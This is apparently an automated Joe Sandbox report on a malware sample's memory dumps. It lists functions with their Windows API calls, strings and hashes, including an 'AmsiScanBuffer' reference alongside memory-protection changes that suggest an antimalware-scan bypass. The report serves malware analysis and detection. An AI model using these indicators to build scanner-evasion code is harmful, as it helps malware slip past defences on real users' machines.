Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 7b15116c64ac50c43ead611201900057267caceda234b69a8d4724db697cab45
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 2AD06730E15665F5EA0D6B13ECB43D42261BB64B09FE4041EC56A422A2DF3D855AC341

Function 0000019291625810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000019291625896

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: cba6a25ac5694ed22176e42de099da792cc5ad4f93cdfb1e7cff59962968c64f
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 2D02FD32619B9496E764CB56F4A039AB7A0F3C5798F204519EACE87BA9DF7CC444CF00

Function 0000019291622C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000019291622CAD
TlsGetValue.KERNEL32 ref: 0000019291622CBC
TlsGetValue.KERNEL32 ref: 0000019291622CCB
TlsSetValue.KERNEL32 ref: 0000019291622E0F
TlsSetValue.KERNEL32 ref: 0000019291622E1E
TlsSetValue.KERNEL32 ref: 0000019291622E2D

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: aafad529d517a6cf4056eb3632e22745c6e6fbc962e270f3c4fa02eaa70dbaca
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: A251A736B04621A7E768CB17E8606DAB3A0F788B88F70491DDD5A83796DF38D945CB40

Function 0000019291622AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000019291622AE1
TlsGetValue.KERNEL32 ref: 0000019291622AF0
TlsGetValue.KERNEL32 ref: 0000019291622AFF
TlsSetValue.KERNEL32 ref: 0000019291622C3B
TlsSetValue.KERNEL32 ref: 0000019291622C4A
TlsSetValue.KERNEL32 ref: 0000019291622C59

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 70bd97b601fda48e8cef92abd47afc0059184a4f271d2cc79991887cfa9f656f
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 7251D735B14661A7E768DF17F86069AB3A0F388B8DF60451DDD5A83796DF38D805CB00

Function 0000019291625E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000019291625E66

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 9626df13e093560fff08b310d91827a5d95189e8b0a7e36c4d278c2a2bfa8a6e
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: F461FE36929B50D6E764CF16E4607AAB7A0F38874CF604519FA8D83BA9DB7DC540CF00

Function 0000019291623EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000019291623A5B), ref: 0000019291623EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000019291623A5B), ref: 0000019291623F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000019291623A5B), ref: 0000019291623F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000019291623A5B), ref: 0000019291623F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000019291623A5B), ref: 0000019291623F68

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 7986a2d5c8c51723cf784fe034c216ddcf0f23654953a820d8cf768348afba85
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 0C118F36B04750A3EB248B26F45468AA7B0FB48B98F14042EDE9D477A5EB7EC945C780

Function 0000019291628CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000019291628CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000019291628D62
RtlUnwindEx.NTDLL ref: 0000019291628DBC

Strings

csm, xrefs: 0000019291628D49

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 792061a4ee62e8d45a1b8d5f1813e47de47cb108d7bb074b7d3f71e821d459e9
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 2E510932B11620AADB5CCF17E864BAC37D9F354B9CF248918DE998778AD778C841C700

Function 00000192913B9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000192913B9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000192913B9FBC

Strings

csm, xrefs: 00000192913B9EF6
csm, xrefs: 00000192913BA00E

Memory Dump Source

Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 20461cd6c146f0c2c25c89d5ff7b9a77972922ba07aa911b26247d3002ea1ba1
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: A651CF722907A0AAEB74AF1395643B877B0F354B9DF34411EDA8947BC6EB38C454CB09

Function 000001929162AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001929162AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001929162ABBC

Strings

csm, xrefs: 000001929162AAF6
csm, xrefs: 000001929162AC0E

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: b9ce1dd71692dc0b547fdc49359ee461310e818bd96e2b7ec8b7e86232b4c52c
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: F351B232A007A0ABEB788F23D56439877A1F355B9DF24491ADA99C7FD6CB78C450CB01

Function 000001929162A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001929162A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001929162A7A7

Strings

RCC, xrefs: 000001929162A777
MOC, xrefs: 000001929162A76F

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: d07ede96eefef2bd8c0b7d79333d7b8805c3e5291702ce41b41b146dbc3e515e
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 5D61B136904BD491EB348F16E4507DAB7A0F785B98F144A19EBD893F96DBBCC190CB00

Function 0000019291623950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000019291623972
StrStrW.SHLWAPI ref: 0000019291623990
StrToIntW.SHLWAPI ref: 00000192916239B7

Part of subcall function 0000019291621A30: OpenProcess.KERNEL32 ref: 0000019291621A56
Part of subcall function 0000019291621A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000019291621A74
Part of subcall function 0000019291621A30: PathFindFileNameW.SHLWAPI ref: 0000019291621A83
Part of subcall function 0000019291621A30: lstrlenW.KERNEL32 ref: 0000019291621A8F
Part of subcall function 0000019291621A30: StrCpyW.SHLWAPI ref: 0000019291621AA2
Part of subcall function 0000019291621A30: CloseHandle.KERNEL32 ref: 0000019291621AB0

Part of subcall function 0000019291623F88: StrCmpNIW.SHLWAPI(?,?,?,000001929162272F), ref: 0000019291623FA0

Strings

pid_, xrefs: 0000019291623968

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 66bd4f55da13f4b59e98e4acfdb28113792a7d8791dde31b7d88153922c324e0
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: A7115131B147A1B1FB149B27E8213DA62A4F748798FA4483DEE59C3696EF78C906C700

Function 0000019291631FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000019291632027
WriteFile.KERNEL32 ref: 0000019291632304
WriteFile.KERNEL32 ref: 000001929163234A
GetLastError.KERNEL32 ref: 0000019291632409

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: f219c63d4dc028b0b0ce1447489ac9524c0f6e21b6d9c99f1e0dca9cf36c20d2
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 54D1DD32B14AA4A9E711CFA6D4502DC37B1F354BDCF60421ADE6DA7B9ADA34C15BC340

Function 00000192916214A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000192916214C6
HeapFree.KERNEL32 ref: 00000192916214D5
GetProcessHeap.KERNEL32 ref: 00000192916214E2
HeapFree.KERNEL32 ref: 00000192916214F1
GetProcessHeap.KERNEL32 ref: 0000019291621501

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 8a48e6d700463fcfeab801aff0800fb988a01873dc4cec5b61f32d991fb64db3
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: F0018C32A10BA0EAE714DF67E81418977A0F788F89F294029DF5E43729DF34D052C740

Function 00000192916328F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000192916328DF), ref: 0000019291632A12

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 2e5d550bb0ff5774f388a2abceff763c23d2ba184b1813fa39a51aa8eb77a35e
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: A291AE32E10665AAFB648F6798603ED2BA0B754BDCF64410EDE6A57A96DB34C487C300

Function 0000019291628090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000192916280BC
GetCurrentThreadId.KERNEL32 ref: 00000192916280CA
GetCurrentProcessId.KERNEL32 ref: 00000192916280D6
QueryPerformanceCounter.KERNEL32 ref: 00000192916280E6

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: b29db566214d1f34b32fe81bc5787d43e233a910d2cd102b483550210b5c1b80
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 73113936B10F249AEB00CF61E8653E833A4F719B58F540E29EA6D87BA9DF78C155C340

Function 00000192916227E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000192916228CC
StrCpyW.SHLWAPI ref: 00000192916228E5

Part of subcall function 0000019291623F88: StrCmpNIW.SHLWAPI(?,?,?,000001929162272F), ref: 0000019291623FA0

Strings

\\.\pipe\, xrefs: 00000192916228D7

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 434caa547e09e61b9d2bf416284cbbe34976128aa67481127ba319d742b5492f
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 0771B636B04BA265EB78DF2B98643EA6794F3857C8F64441EDD4A83B8ADF35C605C700

Function 00000192913B80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000192913B80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000192913B8162

Strings

csm, xrefs: 00000192913B8149

Memory Dump Source

Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: aa6aadf5c615c41b86438a76b312011be349341e2f6dd94f5e97f4297872b6ff
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 8151A432352A20AADB54EF17D464BBC33B1F744B9CF25866DDA464B78AE778C841C704

Function 00000192913B9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000192913B9BA7

Strings

RCC, xrefs: 00000192913B9B77
MOC, xrefs: 00000192913B9B6F

Memory Dump Source

Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: cf0e4d7c5a9e1b84fb1151a5ab56157b542282e9efdf3298abc1ca4b125cb260
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: B7619072508BC492DB71EF16E4507EAB7B0F785B98F14421DEB9807B9AEB78C190CB04

Function 0000019291632660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000019291632778
GetLastError.KERNEL32 ref: 000001929163279D

Strings

U, xrefs: 0000019291632722

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 6b9847350dfc3aff0d3ab739328f00ad8d5b643e7919bbd7cad3dde2ed32d607
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 14411932B15AA0A6E710CF26E4147EAB7B4F7487C8F604129EE5D87799EB3CC402C740

Function 0000019291629178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

